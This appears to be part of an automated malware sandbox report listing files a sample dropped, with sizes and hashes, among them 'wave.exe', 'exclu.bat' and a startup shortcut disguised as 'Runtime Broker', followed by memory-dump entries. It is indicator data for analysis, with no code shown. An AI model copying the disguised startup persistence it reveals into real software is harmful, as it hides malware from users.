C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgaepdxg.eus.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\exclu.bat

Filesize
605B

MD5
482c5ca033759104a39caa4f98138485

SHA1
1e6b5a3d549d387653185d801388cd497b4667f1

SHA256
4f810c50d806c5d0ae90e485e4b98aee927c1d21b439de1f279e5cf8e3165199

SHA512
08f22cd2de54551978a62bceef2100ab9c38928758744677996d9239edd3294df0e1f30f36778f19872de351cf193cc611838c0ca4beff255027d3a229aac432

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Users\Admin\AppData\Local\Temp\wave.exe

Filesize
40KB

MD5
e044b46448bcf34e6dbb3e265f64c9a6

SHA1
1512633d09dec18b32649ce1a6fda58008ae648c

SHA256
1050dbff60cf45c010d6986611d62909f40ef92ebe62d9b364c8ce5493dbcd4b

SHA512
0111de1e807092a885aeed99117f46b33cd6ad4448ac265967098a9ee72561df807e5ca46f5cfafeab3f7903b06725ef40aa31d106ebd243dcdcf9fa5e59b106

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk

Filesize
808B

MD5
2ce1c5c3b00eb2e50e56bb3c82f2eb8a

SHA1
15bd455ea0a9080cbe55cd94cf4429d599dda31a

SHA256
cb651c4e82dbdcf047e69f354dd65f66a21b7becae0302cfaae87dbb029f6cd7

SHA512
3db187e666f944fa3ff18a47cdddb714244e5774e571ce5dd92a46c23e2d1c0411a63e101d5ce663561c88106914b7f58415b50113eb0b368e65bb4048c8b04c

Download Submit
memory/708-126-0x0000000000380000-0x0000000000390000-memory.dmp

Filesize
64KB

Download
memory/3888-16-0x0000023E658E0000-0x0000023E65902000-memory.dmp

Filesize
136KB

Download
memory/4776-90-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-98-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-99-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-100-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-95-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-96-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-97-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-94-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-89-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download
memory/4776-88-0x0000024821870000-0x0000024821871000-memory.dmp

Filesize
4KB

Download